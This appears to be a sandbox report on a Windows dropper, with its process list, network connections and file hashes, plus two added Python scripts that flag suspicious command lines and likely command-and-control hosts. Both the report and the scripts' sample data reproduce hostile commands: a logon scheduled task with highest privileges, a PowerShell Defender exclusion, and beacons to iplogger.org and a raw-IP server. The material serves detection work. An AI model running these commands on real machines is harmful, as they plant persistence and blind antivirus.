| C:\Users\Admin\AppData\Local\Temp\setup.exe | "C:\Users\Admin\AppData\Local\Temp\setup.exe" |
| C:\Windows\winnetdriv.exe | "C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487156 0 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 424 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 272 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 988 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit |
| C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' |
| C:\Users\Admin\AppData\Roaming\services64.exe | "C:\Users\Admin\AppData\Roaming\services64.exe" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe" |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe" |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE |
| C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS5FFB.tmp\Install.cmd" " |
| C:\Program Files\Internet Explorer\iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1732 CREDAT:275457 /prefetch:2 |
| C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit |
| C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' |
| C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe" |
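The process list above contains the three command lines a responder should be able to pick out of any endpoint telemetry without knowing this sample: a scheduled task registered at logon with the highest run level and a target under the user's profile, a Defender exclusion added through Add-MpPreference for a file in %TEMP%, and binaries named after Windows service hosts (services64.exe, sihost64.exe) running from AppData. The script below is an added example written for this page, not part of the sandbox report or of any vendor's detection content. The sample command lines are constructed: copies of lines from the Processes section plus two benign lines. The look-alike name list, the user-writable path set and the "two of three flags" threshold for the scheduled-task rule are this editor's assumptions and would be tuned to an environment's baseline.

```python
"""Triage rules for the process command lines recorded in this detonation.

Added example, not part of the sandbox report. The sample lines are
constructed: copies of command lines from the Processes section above,
plus two benign lines so the rules have something to leave alone.
"""
import re

SAMPLE_COMMAND_LINES = [line for line in r'''
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487156 0
C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe
schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
'''.splitlines() if line.strip()]

# Locations an unprivileged user can write to; a persistence target here is
# the pattern to worry about, not the schtasks call by itself (assumed set).
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|ProgramData|Windows\\Temp)\\", re.I)
# Names that imitate Windows service hosts (services.exe, sihost.exe, ...); assumed list.
LOOKALIKE = re.compile(r"^(?:services|sihost|svchost|csrss|lsass|winlogon)\d*\.exe$", re.I)
SYSTEM_DIRS = re.compile(r"\\Windows\\(?:System32|SysWOW64)\\", re.I)


def image_path(cmdline):
    """First token of a command line, with surrounding quotes removed."""
    m = re.match(r'\s*"([^"]+)"|(\S+)', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def schtasks_persistence(cmd):
    low = cmd.lower()
    if "schtasks" not in low or "/create" not in low:
        return None
    m = re.search(r"""/tr\s+'?"?([^"']+)""", cmd, re.I)
    target = m.group(1).strip() if m else ""
    flags = []
    if re.search(r"/sc\s+onlogon", low):
        flags.append("onlogon")
    if re.search(r"/rl\s+highest", low):
        flags.append("highest privileges")
    if USER_WRITABLE.search(target):
        flags.append("user-writable target")
    # Admin-created tasks rarely combine two of these; the sample has all three.
    if len(flags) >= 2:
        return f"scheduled-task persistence ({', '.join(flags)}): {target}"
    return None


def defender_exclusion(cmd):
    m = re.search(r'Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+"?([^"]+)', cmd, re.I)
    return f"Defender exclusion added ({m.group(1)}): {m.group(2).strip()}" if m else None


def lookalike_binary(cmd):
    path = image_path(cmd)
    name = path.rsplit("\\", 1)[-1]
    if LOOKALIKE.match(name) and not SYSTEM_DIRS.search(path):
        return f"system-binary lookalike outside System32: {path}"
    return None


def cmd_c_hexname(cmd):
    # The dropper fans out through "cmd /c <hex-named>.exe" with no path.
    m = re.search(r"cmd\.exe\s+/c\s+([0-9a-f]{6,}\.exe)\s*$", cmd, re.I)
    return f"cmd /c launch of bare hex-named component: {m.group(1)}" if m else None


RULES = (schtasks_persistence, defender_exclusion, lookalike_binary, cmd_c_hexname)


def scan(lines):
    """Run every rule over every command line; return one dict per hit."""
    hits = []
    for line in lines:
        for rule in RULES:
            verdict = rule(line)
            if verdict:
                hits.append({"rule": rule.__name__, "verdict": verdict, "cmdline": line})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(f"[{hit['rule']}] {hit['verdict']}")
```

Run against the sample, five of the eight lines fire (both schtasks lines, the Add-MpPreference line, sihost64.exe and the cmd /c fan-out); the daily backup task and the iexplore.exe launch do not. The schtasks rule deliberately needs two of its three flags so that an onlogon task pointing at Program Files, or a highest-run-level task created by an installer, stays quiet on its own.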
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 104.26.4.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 104.26.5.15:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.27.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 74.114.154.18:443 | lenak513.tumblr.com | tcp |
| N/A | 127.0.0.1:49262 | | tcp |
| N/A | 127.0.0.1:49264 | | tcp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| SG | 37.0.11.8:80 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 184.50.113.144:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 72.246.29.11:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| SG | 37.0.10.236:80 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
| LV | 45.142.213.135:30058 | | tcp |
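Most of the rows in the table above are not attacker infrastructure: DNS queries to 8.8.8.8, geolocation look-ups (ipinfo.io, db-ip.com, maxmind.com), Microsoft CRL and certificate fetches, and loopback connections. What remains is a small set of destinations, and the one contacted most often (45.142.213.135 on port 30058, never resolved by name) is the obvious blocklist candidate. The script below is an added example for this page, not part of the sandbox report: it parses the table, tolerating rows whose Domain cell is empty or missing, classifies each row, and counts connections per destination. The domain categories (which names count as noise, IP look-up or abused hosting) are this editor's assumptions, not sandbox labels, and the sample table is constructed from a subset of the report's rows.

```python
"""Triage the Network table of this report: which rows are name resolution,
which are sandbox/OS noise, and which destinations deserve a blocklist entry.

Added example, not part of the report. The domain sets are this editor's
assumptions about what is noise versus what the sample contacted on
purpose; the sample table is constructed from rows of the table above.
"""
from collections import Counter

SAMPLE_NETWORK_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 104.26.5.15:443 | api.db-ip.com | tcp |
| GB | 37.0.8.235:80 | tcp | |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| N/A | 127.0.0.1:49262 | tcp | |
| GB | 184.50.113.144:80 | crl.microsoft.com | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp |
"""

PROTOS = {"tcp", "udp"}
# Assumed categories (editor's judgement, not the sandbox's labels).
IP_LOOKUP = {"ipinfo.io", "api.db-ip.com", "db-ip.com", "www.maxmind.com"}
ABUSED_HOSTING = {"iplogger.org", "cdn.discordapp.com", "raw.githubusercontent.com", "github.com"}
OS_NOISE = {"crl.microsoft.com", "www.microsoft.com", "c.pki.goog", "ieonline.microsoft.com"}


def parse_rows(table):
    """Parse the pipe table. Rows whose Domain cell is empty or missing
    (so the protocol sits in the Domain column) are accepted as well."""
    rows = []
    for line in table.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if cells[0] == "Country":
            continue
        country, dest = cells[0], cells[1]
        rest = [c for c in cells[2:] if c]
        if len(rest) == 1 and rest[0] in PROTOS:
            domain, proto = "", rest[0]
        else:
            domain, proto = rest[0], rest[1]
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def classify(row):
    if row["ip"].startswith("127."):
        return "loopback"
    if row["port"] == 53 and row["proto"] == "udp":
        return "dns-query"
    domain = row["domain"].lower()
    if domain in OS_NOISE:
        return "os-noise"
    if domain in IP_LOOKUP:
        return "ip-lookup"
    if domain in ABUSED_HOSTING:
        return "abused-hosting"
    if not domain:
        # A raw IP the sample never resolved by name is hard-coded somewhere.
        return "c2-candidate" if row["port"] not in (80, 443) else "raw-ip-http"
    return "unclassified"


def triage(rows):
    """Count rows per category and per destination worth an analyst's look."""
    per_category = Counter()
    per_destination = Counter()
    for row in rows:
        category = classify(row)
        per_category[category] += 1
        if category in ("c2-candidate", "raw-ip-http", "abused-hosting", "unclassified"):
            per_destination[(f"{row['ip']}:{row['port']}", row["domain"] or "-", category)] += 1
    return per_category, per_destination


def dns_only_domains(rows):
    """Domains resolved but never connected to (NXDOMAIN, sinkholed or dead)."""
    queried = {r["domain"] for r in rows if classify(r) == "dns-query"}
    connected = {r["domain"] for r in rows if r["proto"] == "tcp" and r["domain"]}
    return sorted(queried - connected)


if __name__ == "__main__":
    parsed = parse_rows(SAMPLE_NETWORK_TABLE)
    categories, destinations = triage(parsed)
    print(dict(categories))
    for (dest, domain, category), n in destinations.most_common():
        print(f"{n:3d}  {dest:24s} {domain:22s} {category}")
    print("resolved but never contacted:", dns_only_domains(parsed))
```

On the sample, 45.142.213.135:30058 is the only c2-candidate and accounts for three of the twelve rows; watira.xyz is resolved but never contacted, which is worth keeping as an indicator even though no session followed. The raw-ip-http bucket (37.0.8.235:80 here) is kept separate because plain HTTP to an unnamed host is a weaker signal than a non-standard port, but in this report those hosts also recur across the run.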
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 3394285ab7e1ef48bc775f71ed7b0a76 |
| SHA1 | 646fadf1a0a0dafe07319c86de0587ed96a0fc2b |
| SHA256 | 732b086183981289f4dff07f2054fa1356bba8d975359e2f40b6f1adae084467 |
| SHA512 | 31d754a5f0f005eaf18eed0bd021e2c3698935dd51b10e7c21d4236abe875faf9945aad12e8711da9e42952ab586adf4c98f4a3d6db48e00ab53bb02b7258dc8 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe
| MD5 | 68a59b521798b22a72d30dd7ff6eb04a |
| SHA1 | 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da |
| SHA256 | e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc |
| SHA512 | 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546 |
memory/2704-51-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-59-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2704-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2704-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-56-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-55-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-52-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-50-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe
| MD5 | c0d18a829910babf695b4fdaea21a047 |
| SHA1 | 236a19746fe1a1063ebe077c8a0553566f92ef0f |
| SHA256 | 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98 |
| SHA512 | cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe
| MD5 | 80cf471e52dcc848d81092439489f12f |
| SHA1 | 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5 |
| SHA256 | 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f |
| SHA512 | 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131 |
memory/1912-131-0x0000000000A70000-0x0000000000BB2000-memory.dmp
memory/1784-130-0x0000000000840000-0x000000000092E000-memory.dmp
\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe
| MD5 | 2b32e3fb6d4deb5e9f825f9c9f0c75a6 |
| SHA1 | 2049fdbbe5b72ff06a7746b57582c9faa6186146 |
| SHA256 | 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2 |
| SHA512 | ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa |
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\24ebc9ce784c63.exe
| MD5 | 5866ab1fae31526ed81bfbdf95220190 |
| SHA1 | 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f |
| SHA256 | 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e |
| SHA512 | 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5 |
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe
| MD5 | 079d742f6fc3fcc2eca352a1537e5103 |
| SHA1 | d904d7432a367ad078c99c281b67705e7332496a |
| SHA256 | 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39 |
| SHA512 | 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe
| MD5 | 3f9f7dfccefb41726d6b99e434155467 |
| SHA1 | f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1 |
| SHA256 | 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34 |
| SHA512 | e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762 |
memory/660-140-0x0000000000950000-0x000000000097C000-memory.dmp
memory/2420-139-0x0000000000D00000-0x0000000000D08000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 01ad10e59fa396af2d5443c5a14c1b21 |
| SHA1 | f209a4f0bb2a96e3ee6a55689e7f00e79c04f722 |
| SHA256 | bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137 |
| SHA512 | 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02 |
memory/1744-153-0x0000000000270000-0x0000000000354000-memory.dmp
memory/3036-142-0x0000000002370000-0x0000000002454000-memory.dmp
memory/2692-138-0x000000013FC70000-0x000000013FC80000-memory.dmp
memory/660-159-0x0000000000140000-0x0000000000146000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2704-42-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2704-39-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/660-160-0x0000000000150000-0x0000000000170000-memory.dmp
memory/660-161-0x0000000000170000-0x0000000000176000-memory.dmp
memory/1912-162-0x0000000000270000-0x0000000000282000-memory.dmp
memory/2704-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2704-170-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2704-169-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2704-167-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2704-164-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2704-163-0x0000000000400000-0x0000000000A07000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabBE81.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarBEA3.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/564-225-0x0000000000400000-0x00000000032F3000-memory.dmp
memory/2496-226-0x0000000000400000-0x0000000003346000-memory.dmp
memory/2692-229-0x00000000006C0000-0x00000000006CE000-memory.dmp
C:\Users\Admin\AppData\Roaming\services64.exe
| MD5 | ad0aca1934f02768fd5fedaf4d9762a3 |
| SHA1 | 0e5b8372015d81200c4eff22823e854d0030f305 |
| SHA256 | dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388 |
| SHA512 | 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7 |
memory/1716-233-0x000000013FDA0000-0x000000013FDB0000-memory.dmp
memory/1912-234-0x00000000087E0000-0x000000000886C000-memory.dmp
memory/1912-235-0x00000000007A0000-0x00000000007BE000-memory.dmp
memory/1360-245-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1360-242-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-240-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-238-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-236-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-246-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1360-250-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS5FFB.tmp\Install.cmd
| MD5 | a3c236c7c80bbcad8a4efe06a5253731 |
| SHA1 | f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07 |
| SHA256 | 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d |
| SHA512 | dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\favicon[1].png
| MD5 | 18c023bc439b446f91bf942270882422 |
| SHA1 | 768d59e3085976dba252232a65a4af562675f782 |
| SHA256 | e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482 |
| SHA512 | a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 799f3adcfbb6596256a7c7b1e0237480 |
| SHA1 | f570b98814687d730a409db056ec9afea9206758 |
| SHA256 | 616a0cc53aa7ae199ac985d8cc545dba2d9ba15bd27c9baa32bb3c9876b875a0 |
| SHA512 | 6a46f3b31ee1a37d7458432ee2d3fd630df7bd29f248bed38cb631b545e68b85742e587580902bc5daf2604d649c86a4d318500246361f48ed58a58f8443fad1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d2f3d7662156d79d501168854ba7abe6 |
| SHA1 | 19671aabbbcc1ea2c1aec6c26cdab1d3e1e1a868 |
| SHA256 | 4deb9de2a86ca348e461ef94c1687cd3a58ee78fac78d9c297affd64c4e17333 |
